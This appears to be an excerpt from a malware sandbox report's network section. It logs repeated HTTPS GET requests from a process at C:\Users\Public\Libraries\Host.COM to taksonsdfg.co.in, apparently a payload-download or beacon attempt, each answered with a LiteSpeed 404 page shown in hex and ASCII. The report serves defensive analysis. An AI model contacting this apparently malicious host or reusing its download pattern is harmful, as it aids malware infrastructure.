                                                                                    2024-10-14 02:30:15 UTC952INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79
                                                                                    Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</sty
                                                                                    2024-10-14 02:30:15 UTC299INData Raw: 2d 74 6f 70 3a 20 31 70 78 20 73 6f 6c 69 64 20 72 67 62 61 28 30 2c 30 2c 30 2c 30 2e 31 35 29 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 31 70 78 20 30 20 72 67 62 61 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 2c 20 30 2e 33 29 20 69 6e 73 65 74 3b 22 3e 0a 3c 62 72 3e 50 72 6f 75 64 6c 79 20 70 6f 77 65 72 65 64 20 62 79 20 4c 69 74 65 53 70 65 65 64 20 57 65 62 20 53 65 72 76 65 72 3c 70 3e 50 6c 65 61 73 65 20 62 65 20 61 64 76 69 73 65 64 20 74 68 61 74 20 4c 69 74 65 53 70 65 65 64 20 54 65 63 68 6e 6f 6c 6f 67 69 65 73 20 49 6e 63 2e 20 69 73 20 6e 6f 74 20 61 20 77 65 62 20 68 6f 73 74 69 6e 67 20 63 6f 6d 70 61 6e 79 20 61 6e 64 2c 20 61 73 20 73 75 63 68 2c 20 68 61 73 20 6e 6f 20 63 6f 6e 74 72 6f 6c 20 6f 76 65 72 20 63 6f 6e 74 65 6e 74 20
                                                                                    Data Ascii: -top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by LiteSpeed Web Server<p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    50192.168.2.449910108.170.55.2024437652C:\Users\Public\Libraries\Host.COM
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-10-14 02:30:16 UTC178OUTGET /34243456dfgd/255_Znrgbbhcbyx HTTP/1.1
                                                                                    Connection: Keep-Alive
                                                                                    Accept: */*
                                                                                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                                                    Host: taksonsdfg.co.in
                                                                                    2024-10-14 02:30:16 UTC416INHTTP/1.1 404 Not Found
                                                                                    Connection: close
                                                                                    cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                                    pragma: no-cache
                                                                                    content-type: text/html
                                                                                    content-length: 1251
                                                                                    date: Mon, 14 Oct 2024 02:30:16 GMT
                                                                                    server: LiteSpeed
                                                                                    alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                                                                                    2024-10-14 02:30:16 UTC952INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79
                                                                                    Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</sty
                                                                                    2024-10-14 02:30:16 UTC299INData Raw: 2d 74 6f 70 3a 20 31 70 78 20 73 6f 6c 69 64 20 72 67 62 61 28 30 2c 30 2c 30 2c 30 2e 31 35 29 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 31 70 78 20 30 20 72 67 62 61 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 2c 20 30 2e 33 29 20 69 6e 73 65 74 3b 22 3e 0a 3c 62 72 3e 50 72 6f 75 64 6c 79 20 70 6f 77 65 72 65 64 20 62 79 20 4c 69 74 65 53 70 65 65 64 20 57 65 62 20 53 65 72 76 65 72 3c 70 3e 50 6c 65 61 73 65 20 62 65 20 61 64 76 69 73 65 64 20 74 68 61 74 20 4c 69 74 65 53 70 65 65 64 20 54 65 63 68 6e 6f 6c 6f 67 69 65 73 20 49 6e 63 2e 20 69 73 20 6e 6f 74 20 61 20 77 65 62 20 68 6f 73 74 69 6e 67 20 63 6f 6d 70 61 6e 79 20 61 6e 64 2c 20 61 73 20 73 75 63 68 2c 20 68 61 73 20 6e 6f 20 63 6f 6e 74 72 6f 6c 20 6f 76 65 72 20 63 6f 6e 74 65 6e 74 20
                                                                                    Data Ascii: -top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by LiteSpeed Web Server<p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    51192.168.2.449918108.170.55.2024437652C:\Users\Public\Libraries\Host.COM
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-10-14 02:30:17 UTC178OUTGET /34243456dfgd/255_Znrgbbhcbyx HTTP/1.1
                                                                                    Connection: Keep-Alive
                                                                                    Accept: */*
                                                                                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                                                    Host: taksonsdfg.co.in
                                                                                    2024-10-14 02:30:17 UTC416INHTTP/1.1 404 Not Found
                                                                                    Connection: close
                                                                                    cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                                    pragma: no-cache
                                                                                    content-type: text/html
                                                                                    content-length: 1251
                                                                                    date: Mon, 14 Oct 2024 02:30:17 GMT
                                                                                    server: LiteSpeed
                                                                                    alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                                                                                    2024-10-14 02:30:17 UTC952INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79
                                                                                    Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</sty
                                                                                    2024-10-14 02:30:17 UTC299INData Raw: 2d 74 6f 70 3a 20 31 70 78 20 73 6f 6c 69 64 20 72 67 62 61 28 30 2c 30 2c 30 2c 30 2e 31 35 29 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 31 70 78 20 30 20 72 67 62 61 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 2c 20 30 2e 33 29 20 69 6e 73 65 74 3b 22 3e 0a 3c 62 72 3e 50 72 6f 75 64 6c 79 20 70 6f 77 65 72 65 64 20 62 79 20 4c 69 74 65 53 70 65 65 64 20 57 65 62 20 53 65 72 76 65 72 3c 70 3e 50 6c 65 61 73 65 20 62 65 20 61 64 76 69 73 65 64 20 74 68 61 74 20 4c 69 74 65 53 70 65 65 64 20 54 65 63 68 6e 6f 6c 6f 67 69 65 73 20 49 6e 63 2e 20 69 73 20 6e 6f 74 20 61 20 77 65 62 20 68 6f 73 74 69 6e 67 20 63 6f 6d 70 61 6e 79 20 61 6e 64 2c 20 61 73 20 73 75 63 68 2c 20 68 61 73 20 6e 6f 20 63 6f 6e 74 72 6f 6c 20 6f 76 65 72 20 63 6f 6e 74 65 6e 74 20
                                                                                    Data Ascii: -top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by LiteSpeed Web Server<p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    52192.168.2.449929108.170.55.2024437652C:\Users\Public\Libraries\Host.COM
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-10-14 02:30:18 UTC178OUTGET /34243456dfgd/255_Znrgbbhcbyx HTTP/1.1
                                                                                    Connection: Keep-Alive
                                                                                    Accept: */*
                                                                                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                                                    Host: taksonsdfg.co.in
                                                                                    2024-10-14 02:30:18 UTC416INHTTP/1.1 404 Not Found
                                                                                    Connection: close
                                                                                    cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                                    pragma: no-cache
                                                                                    content-type: text/html
                                                                                    content-length: 1251
                                                                                    date: Mon, 14 Oct 2024 02:30:18 GMT
                                                                                    server: LiteSpeed
                                                                                    alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                                                                                    2024-10-14 02:30:18 UTC952INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79
                                                                                    Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</sty
                                                                                    2024-10-14 02:30:18 UTC299INData Raw: 2d 74 6f 70 3a 20 31 70 78 20 73 6f 6c 69 64 20 72 67 62 61 28 30 2c 30 2c 30 2c 30 2e 31 35 29 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 31 70 78 20 30 20 72 67 62 61 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 2c 20 30 2e 33 29 20 69 6e 73 65 74 3b 22 3e 0a 3c 62 72 3e 50 72 6f 75 64 6c 79 20 70 6f 77 65 72 65 64 20 62 79 20 4c 69 74 65 53 70 65 65 64 20 57 65 62 20 53 65 72 76 65 72 3c 70 3e 50 6c 65 61 73 65 20 62 65 20 61 64 76 69 73 65 64 20 74 68 61 74 20 4c 69 74 65 53 70 65 65 64 20 54 65 63 68 6e 6f 6c 6f 67 69 65 73 20 49 6e 63 2e 20 69 73 20 6e 6f 74 20 61 20 77 65 62 20 68 6f 73 74 69 6e 67 20 63 6f 6d 70 61 6e 79 20 61 6e 64 2c 20 61 73 20 73 75 63 68 2c 20 68 61 73 20 6e 6f 20 63 6f 6e 74 72 6f 6c 20 6f 76 65 72 20 63 6f 6e 74 65 6e 74 20
                                                                                    Data Ascii: -top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by LiteSpeed Web Server<p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    53192.168.2.449936108.170.55.2024437652C:\Users\Public\Libraries\Host.COM
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-10-14 02:30:19 UTC178OUTGET /34243456dfgd/255_Znrgbbhcbyx HTTP/1.1
                                                                                    Connection: Keep-Alive
                                                                                    Accept: */*
                                                                                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                                                    Host: taksonsdfg.co.in
                                                                                    2024-10-14 02:30:19 UTC416INHTTP/1.1 404 Not Found
                                                                                    Connection: close
                                                                                    cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                                    pragma: no-cache
                                                                                    content-type: text/html
                                                                                    content-length: 1251
                                                                                    date: Mon, 14 Oct 2024 02:30:19 GMT
                                                                                    server: LiteSpeed
                                                                                    alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                                                                                    2024-10-14 02:30:19 UTC952INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79
                                                                                    Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</sty
                                                                                    2024-10-14 02:30:19 UTC299INData Raw: 2d 74 6f 70 3a 20 31 70 78 20 73 6f 6c 69 64 20 72 67 62 61 28 30 2c 30 2c 30 2c 30 2e 31 35 29 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 31 70 78 20 30 20 72 67 62 61 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 2c 20 30 2e 33 29 20 69 6e 73 65 74 3b 22 3e 0a 3c 62 72 3e 50 72 6f 75 64 6c 79 20 70 6f 77 65 72 65 64 20 62 79 20 4c 69 74 65 53 70 65 65 64 20 57 65 62 20 53 65 72 76 65 72 3c 70 3e 50 6c 65 61 73 65 20 62 65 20 61 64 76 69 73 65 64 20 74 68 61 74 20 4c 69 74 65 53 70 65 65 64 20 54 65 63 68 6e 6f 6c 6f 67 69 65 73 20 49 6e 63 2e 20 69 73 20 6e 6f 74 20 61 20 77 65 62 20 68 6f 73 74 69 6e 67 20 63 6f 6d 70 61 6e 79 20 61 6e 64 2c 20 61 73 20 73 75 63 68 2c 20 68 61 73 20 6e 6f 20 63 6f 6e 74 72 6f 6c 20 6f 76 65 72 20 63 6f 6e 74 65 6e 74 20
                                                                                    Data Ascii: -top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by LiteSpeed Web Server<p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    54192.168.2.449945108.170.55.2024437652C:\Users\Public\Libraries\Host.COM
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-10-14 02:30:20 UTC178OUTGET /34243456dfgd/255_Znrgbbhcbyx HTTP/1.1
                                                                                    Connection: Keep-Alive
                                                                                    Accept: */*
                                                                                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                                                    Host: taksonsdfg.co.in
                                                                                    2024-10-14 02:30:20 UTC416INHTTP/1.1 404 Not Found
                                                                                    Connection: close
                                                                                    cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                                    pragma: no-cache
                                                                                    content-type: text/html
                                                                                    content-length: 1251
                                                                                    date: Mon, 14 Oct 2024 02:30:20 GMT
                                                                                    server: LiteSpeed
                                                                                    alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                                                                                    2024-10-14 02:30:20 UTC952INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79
                                                                                    Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</sty
                                                                                    2024-10-14 02:30:20 UTC299INData Raw: 2d 74 6f 70 3a 20 31 70 78 20 73 6f 6c 69 64 20 72 67 62 61 28 30 2c 30 2c 30 2c 30 2e 31 35 29 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 31 70 78 20 30 20 72 67 62 61 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 2c 20 30 2e 33 29 20 69 6e 73 65 74 3b 22 3e 0a 3c 62 72 3e 50 72 6f 75 64 6c 79 20 70 6f 77 65 72 65 64 20 62 79 20 4c 69 74 65 53 70 65 65 64 20 57 65 62 20 53 65 72 76 65 72 3c 70 3e 50 6c 65 61 73 65 20 62 65 20 61 64 76 69 73 65 64 20 74 68 61 74 20 4c 69 74 65 53 70 65 65 64 20 54 65 63 68 6e 6f 6c 6f 67 69 65 73 20 49 6e 63 2e 20 69 73 20 6e 6f 74 20 61 20 77 65 62 20 68 6f 73 74 69 6e 67 20 63 6f 6d 70 61 6e 79 20 61 6e 64 2c 20 61 73 20 73 75 63 68 2c 20 68 61 73 20 6e 6f 20 63 6f 6e 74 72 6f 6c 20 6f 76 65 72 20 63 6f 6e 74 65 6e 74 20
                                                                                    Data Ascii: -top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by LiteSpeed Web Server<p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    55192.168.2.449954108.170.55.2024437652C:\Users\Public\Libraries\Host.COM
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-10-14 02:30:21 UTC178OUTGET /34243456dfgd/255_Znrgbbhcbyx HTTP/1.1
                                                                                    Connection: Keep-Alive
                                                                                    Accept: */*
                                                                                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                                                    Host: taksonsdfg.co.in
                                                                                    2024-10-14 02:30:21 UTC416INHTTP/1.1 404 Not Found
                                                                                    Connection: close
                                                                                    cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                                    pragma: no-cache
                                                                                    content-type: text/html
                                                                                    content-length: 1251
                                                                                    date: Mon, 14 Oct 2024 02:30:21 GMT
                                                                                    server: LiteSpeed
                                                                                    alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                                                                                    2024-10-14 02:30:21 UTC952INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79
                                                                                    Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</sty
                                                                                    2024-10-14 02:30:21 UTC299INData Raw: 2d 74 6f 70 3a 20 31 70 78 20 73 6f 6c 69 64 20 72 67 62 61 28 30 2c 30 2c 30 2c 30 2e 31 35 29 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 31 70 78 20 30 20 72 67 62 61 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 2c 20 30 2e 33 29 20 69 6e 73 65 74 3b 22 3e 0a 3c 62 72 3e 50 72 6f 75 64 6c 79 20 70 6f 77 65 72 65 64 20 62 79 20 4c 69 74 65 53 70 65 65 64 20 57 65 62 20 53 65 72 76 65 72 3c 70 3e 50 6c 65 61 73 65 20 62 65 20 61 64 76 69 73 65 64 20 74 68 61 74 20 4c 69 74 65 53 70 65 65 64 20 54 65 63 68 6e 6f 6c 6f 67 69 65 73 20 49 6e 63 2e 20 69 73 20 6e 6f 74 20 61 20 77 65 62 20 68 6f 73 74 69 6e 67 20 63 6f 6d 70 61 6e 79 20 61 6e 64 2c 20 61 73 20 73 75 63 68 2c 20 68 61 73 20 6e 6f 20 63 6f 6e 74 72 6f 6c 20 6f 76 65 72 20 63 6f 6e 74 65 6e 74 20
                                                                                    Data Ascii: -top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by LiteSpeed Web Server<p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    56192.168.2.449962108.170.55.2024437652C:\Users\Public\Libraries\Host.COM
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-10-14 02:30:22 UTC178OUTGET /34243456dfgd/255_Znrgbbhcbyx HTTP/1.1
                                                                                    Connection: Keep-Alive
                                                                                    Accept: */*
                                                                                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                                                    Host: taksonsdfg.co.in
                                                                                    2024-10-14 02:30:22 UTC416INHTTP/1.1 404 Not Found
                                                                                    Connection: close
                                                                                    cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                                    pragma: no-cache
                                                                                    content-type: text/html
                                                                                    content-length: 1251
                                                                                    date: Mon, 14 Oct 2024 02:30:22 GMT
                                                                                    server: LiteSpeed
                                                                                    alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                                                                                    2024-10-14 02:30:22 UTC952INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79
